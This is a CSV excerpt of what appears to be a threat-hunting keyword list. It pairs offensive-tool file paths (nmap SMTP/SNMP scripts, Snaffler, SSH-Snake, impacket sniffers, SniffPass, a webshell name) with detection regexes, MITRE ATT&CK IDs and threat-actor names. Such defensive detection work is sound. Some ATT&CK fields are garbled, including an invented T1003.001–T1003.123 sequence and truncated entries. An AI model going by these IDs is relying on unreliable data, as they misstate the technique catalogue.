"*/smtp-open-relay.nse*",".{0,1000}\/smtp\-open\-relay\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11441"
"*/smtp-strangeport.nse*",".{0,1000}\/smtp\-strangeport\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11442"
"*/smtp-user-enum*",".{0,1000}\/smtp\-user\-enum.{0,1000}","offensive_tool_keyword","smtp-user-enum","Username guessing tool primarily for use against the default Solaris SMTP service. Can use either EXPN - VRFY or RCPT TO.","T1133 - T1110.001","TA0007 - TA0006","N/A","N/A","Credential Access","https://pentestmonkey.net/tools/user-enumeration/smtp-user-enum","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11443"
"*/smtp-vuln-cve2010-4344.nse*",".{0,1000}\/smtp\-vuln\-cve2010\-4344\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11444"
"*/smtp-vuln-cve2011-1720.nse*",".{0,1000}\/smtp\-vuln\-cve2011\-1720\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11445"
"*/smtp-vuln-cve2011-1764.nse*",".{0,1000}\/smtp\-vuln\-cve2011\-1764\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11446"
"*/smtp-vuln-cve2020-28017-through-28026-21nails.nse*",".{0,1000}\/smtp\-vuln\-cve2020\-28017\-through\-28026\-21nails\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://github.com/nccgroup/nmap-nse-vulnerability-scripts","1","1","N/A","N/A","N/A","7","627","59","2022-03-04T09:08:55Z","2021-05-18T15:20:30Z","11447"
"*/smuggler.py*",".{0,1000}\/smuggler\.py.{0,1000}","offensive_tool_keyword","smuggler.py","HTML Smuggling Generator","T1564.001 - T1027 - T1566","TA0005","N/A","N/A","Phishing","https://github.com/infosecn1nja/red-team-scripts/blob/main/smuggler.py","1","1","N/A","N/A","9","3","299","55","2024-08-08T06:11:06Z","2023-01-15T22:37:34Z","11448"
"*/SnaffCon.cs*",".{0,1000}\/SnaffCon\.cs.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tool","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","N/A","10","2341","232","2025-04-03T04:19:29Z","2020-03-30T07:03:47Z","11449"
"*/SnaffCon/Snaffler*",".{0,1000}\/SnaffCon\/Snaffler.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tool","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","N/A","10","2341","232","2025-04-03T04:19:29Z","2020-03-30T07:03:47Z","11450"
"*/SnaffCore/*",".{0,1000}\/SnaffCore\/.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tool","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","N/A","10","2341","232","2025-04-03T04:19:29Z","2020-03-30T07:03:47Z","11451"
"*/Snaffler.exe*",".{0,1000}\/Snaffler\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","11452"
"*/Snaffler.exe*",".{0,1000}\/Snaffler\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","11453"
"*/snaffler.py*",".{0,1000}\/snaffler\.py.{0,1000}","offensive_tool_keyword","pysnaffler","This project is a Python version of the well-known Snaffler project. Not a full implementation of that project - only focusing on SMB share/dir/file enumeration and download and parse.","T1083 - T1087 - T1114 - T1518","TA0007 - TA0009 - TA0010","N/A","N/A","Collection","https://github.com/skelsec/pysnaffler","1","1","N/A","N/A","10","1","91","5","2025-03-15T13:46:34Z","2023-11-17T21:52:40Z","11454"
"*/snafflertest/*",".{0,1000}\/snafflertest\/.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tool","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","N/A","10","2341","232","2025-04-03T04:19:29Z","2020-03-30T07:03:47Z","11455"
"*/SnaffPoint.git*",".{0,1000}\/SnaffPoint\.git.{0,1000}","offensive_tool_keyword","SnaffPoint","A tool for pointesters to find candies in SharePoint","T1210.001 - T1087.002 - T1059.006","TA0007 - TA0002 - TA0006","N/A","N/A","Discovery","https://github.com/nheiniger/SnaffPoint","1","1","N/A","N/A","7","3","254","25","2022-11-04T13:26:24Z","2022-08-25T13:16:06Z","11456"
"*/Snake.nocomments.sh*",".{0,1000}\/Snake\.nocomments\.sh.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","1","N/A","N/A","10","10","2065","198","2024-07-25T09:32:07Z","2023-12-03T04:52:38Z","11457"
"*/Snake.sh*",".{0,1000}\/Snake\.sh.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","1","N/A","N/A","10","10","2065","198","2024-07-25T09:32:07Z","2023-12-03T04:52:38Z","11458"
"*/sniff.py*",".{0,1000}\/sniff\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","11459"
"*/sniff.py*",".{0,1000}\/sniff\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","11460"
"*/sniffer.exe*",".{0,1000}\/sniffer\.exe.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","11461"
"*/sniffer.git*",".{0,1000}\/sniffer\.git.{0,1000}","offensive_tool_keyword","sniffer","A modern alternative network traffic sniffer.","T1040 - T1052.001 - T1046 - T1552.002","TA0011 - TA0007 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/chenjiandongx/sniffer","1","1","N/A","N/A","N/A","8","769","67","2024-03-02T07:48:19Z","2021-11-08T15:36:03Z","11462"
"*/sniffer.py*",".{0,1000}\/sniffer\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","11463"
"*/sniffer.py*",".{0,1000}\/sniffer\.py.{0,1000}","offensive_tool_keyword","RITM","python Man in the middle ","T1557.002 - T1040 - T1098.002 - T1557.001 - T1552.001","TA0006 - TA0007 - TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/Tw1sm/RITM","1","1","N/A","N/A","9","3","292","27","2024-11-20T14:27:24Z","2022-10-05T01:10:33Z","11464"
"*/sniffer-detect.nse*",".{0,1000}\/sniffer\-detect\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11465"
"*/sniffpass-x64*",".{0,1000}\/sniffpass\-x64.{0,1000}","offensive_tool_keyword","SniffPass","password monitoring software that listens to your network - capture the passwords that pass through your network adapter and display them on the screen instantly","T1040 - T1071 - T1041","TA0006 - TA0007 - TA0009","N/A","GoGoogle - Kimsuky","Credential Access","https://www.nirsoft.net/utils/password_sniffer.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","11466"
"*/SnIpEr_SA Shell.php*",".{0,1000}\/SnIpEr_SA\sShell\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","11467"
"*/snmp-brute.nse*",".{0,1000}\/snmp\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11468"
"*/snmp-hh3c-logins.nse*",".{0,1000}\/snmp\-hh3c\-logins\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11469"
"*/snmp-info.nse*",".{0,1000}\/snmp\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11470"
"*/snmp-interfaces.nse*",".{0,1000}\/snmp\-interfaces\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11471"
"*/snmp-ios-config.nse*",".{0,1000}\/snmp\-ios\-config\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11472"
"*/snmp-netstat.nse*",".{0,1000}\/snmp\-netstat\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11473"
"*/snmp-processes.nse*",".{0,1000}\/snmp\-processes\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11474"
"*/snmp-sysdescr.nse*",".{0,1000}\/snmp\-sysdescr\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11475"
"*/snmp-win32-services.nse*",".{0,1000}\/snmp\-win32\-services\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11476"
"*/snmp-win32-shares.nse*",".{0,1000}\/snmp\-win32\-shares\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11477"
"*/snmp-win32-software.nse*",".{0,1000}\/snmp\-win32\-software\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11478"
